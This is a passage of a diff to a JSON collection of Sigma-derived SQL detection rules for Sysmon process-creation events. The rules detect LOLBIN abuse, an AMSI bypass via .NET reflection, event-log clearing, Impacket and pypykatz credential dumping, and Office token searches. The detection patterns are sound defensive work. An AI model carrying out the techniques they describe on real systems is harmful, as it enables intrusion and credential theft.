LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" ], - "filename": "proc_creation_win_ping_hex_ip.yml" + "filename": "proc_creation_win_lolbin_regasm.yml" }, { - "title": "Potential ACTINIUM Persistence Activity", - "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "title": "DLL Execution via Rasautou.exe", + "id": "cd3d1298-eb3b-476c-ac67-12847de55813", "status": "test", - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rasautou.exe' ESCAPE '\\' OR OriginalFileName = 'rasdlui.exe') AND (CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_actinium_persistence.yml" + "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml" }, { - "title": "Use of Forfiles For Execution", - "id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", - "status": "experimental", - "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Privilege Escalation via Weak Service Permissions", + "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "status": "test", + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.execution", - "attack.t1059" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate use via a batch script or by an administrator." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR OriginalFileName = 'forfiles.exe') AND (CommandLine LIKE '% /p %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\') AND (CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% -m %' ESCAPE '\\') AND (CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_forfiles.yml" + "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" }, { - "title": "Suspicious Eventlog Clear or Configuration Change", - "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "status": "stable", - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "title": "Suspicious WMIC Execution Via Office Process", + "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "status": "experimental", + "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "author": "Vadim Khrykov, Cyb3rEng", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "attack.t1562.002", - "car.2016-04-002" + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Maintenance activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_eventlog_clear.yml" + "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" }, { - "title": "File Deletion Via Del", - "id": "379fa130-190e-4c3f-b7bc-6c8e834485f3", - "status": "experimental", - "description": "Detects execution of the builtin \"del\"/\"erase\" commands in order to delete files.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "title": "Netsh Allow Group Policy on Microsoft Defender Firewall", + "id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", + "status": "test", + "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1562.004" ], "falsepositives": [ - "False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity" + "Legitimate administration activity" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '% /f%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% /q%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%group=%' ESCAPE '\\' AND CommandLine LIKE '%new%' ESCAPE '\\' AND CommandLine LIKE '%enable=Yes%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_del_execution.yml" + "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml" }, { - "title": "Potential AMSI Bypass Via .NET Reflection", - "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", - "status": "test", - "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", - "author": "Markus Neis, @Kostastsale", + "title": "Suspicious AgentExecutor PowerShell Execution", + "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "status": "experimental", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" }, { - "title": "Fsutil Behavior Set SymlinkEvaluation", - "id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", + "title": "Add User to Local Administrators Group", + "id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", "status": "experimental", - "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", - "author": "frack113", + "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Legitimate use" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%behavior %' ESCAPE '\\' AND CommandLine LIKE '%set %' ESCAPE '\\' AND CommandLine LIKE '%SymlinkEvaluation%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '% administrators %' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_fsutil_symlinkevaluation.yml" + "filename": "proc_creation_win_susp_add_user_local_admin_group.yml" }, { - "title": "HackTool - Impacket Tools Execution", - "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", + "title": "Hidden Powershell in Link File Pattern", + "id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", "status": "test", - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1557.001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the impacket tools" + "Legitimate commands in .lnk files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\goldenPac%' ESCAPE '\\' OR Image LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR Image LIKE '%\\\\kintercept%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\rpcdump%' ESCAPE '\\' OR Image LIKE '%\\\\samrdump%' ESCAPE '\\' OR Image LIKE '%\\\\secretsdump%' ESCAPE '\\' OR Image LIKE '%\\\\smbexec%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\wmiexec%' ESCAPE '\\' OR Image LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (Image LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.lnk%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impacket_tools.yml" + "filename": "proc_creation_win_susp_embed_exe_lnk.yml" }, { - "title": "Suspicious Extexport Execution", - "id": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "title": "Suspicious Office Token Search Via CLI", + "id": "6d3a3952-6530-44a3-8554-cf17c116c615", "status": "experimental", - "description": "Extexport.exe loads dll and is execute from other folder the original path", - "author": "frack113", + "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Extexport.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Extexport.exe' ESCAPE '\\' OR OriginalFileName = 'extexport.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%eyJ0eXAiOi%' ESCAPE '\\' OR CommandLine LIKE '% eyJ0eX%' ESCAPE '\\' OR CommandLine LIKE '% \"eyJ0eX\"%' ESCAPE '\\' OR CommandLine LIKE '% ''eyJ0eX''%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_extexport.yml" + "filename": "proc_creation_win_susp_office_token_search.yml" }, { - "title": "Interactive AT Job", - "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "status": "test", - "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential PsExec Remote Execution", + "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", + "status": "experimental", + "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unlikely (at.exe deprecated as of Windows 8)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_at_interactive_execution.yml" + "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" }, { - "title": "Suspicious Execution of Taskkill", - "id": "86085955-ea48-42a2-9dd3-85d4c36b167d", + "title": "File Download Using Notepad++ GUP Utility", + "id": "44143844-0631-49ab-97a0-96387d6b2d7c", "status": "experimental", - "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", - "author": "frack113", + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Expected FP with some processes using this techniques to terminate one of their processes during installations and updates" + "Other parent processes other than notepad++ using GUP that are not currently identified" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR OriginalFileName = 'taskkill.exe') AND (CommandLine LIKE '% /f%' ESCAPE '\\' AND CommandLine LIKE '% /im %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_taskkill_execution.yml" + "filename": "proc_creation_win_gup_download.yml" }, { - "title": "HackTool - Pypykatz Credentials Dumping Activity", - "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", + "id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", "status": "test", - "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR Image LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (CommandLine LIKE '%-ModuleName %' ESCAPE '\\' OR CommandLine LIKE '%-ModulePath %' ESCAPE '\\' OR CommandLine LIKE '%-ScriptBlock %' ESCAPE '\\' OR CommandLine LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_pypykatz.yml" + "filename": "proc_creation_win_powershell_ath_remote_fxv_gpu_disablement_command.yml" }, { - "title": "Root Certificate Installed From Susp Locations", - "id": "5f6a601c-2ecb-498b-9c33-660362323afa", + "title": "Use of Squirrel.exe", + "id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of the \"Squirrel.exe\" binary as a LOLBIN. This binary is part of multiple software installations (Slack, Teams, Discord, etc.)", + "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1553.004" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Expected FP with some electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop,...Etc)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\squirrel.exe' ESCAPE '\\' OR Image LIKE '%\\\\update.exe' ESCAPE '\\') AND (((CommandLine LIKE '% --download %' ESCAPE '\\' OR CommandLine LIKE '% --update %' ESCAPE '\\' OR CommandLine LIKE '% --updateRollback=%' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '% --processStart%' ESCAPE '\\' AND CommandLine LIKE '%Discord.exe%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%GitHubDesktop.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--createShortcut%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Teams.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Yammer.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" + "filename": "proc_creation_win_lolbin_squirrel.yml" }, { - "title": "Suspicious WERMGR Process Patterns", - "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "title": "Suspicious Windows App Activity", + "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", "status": "experimental", - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 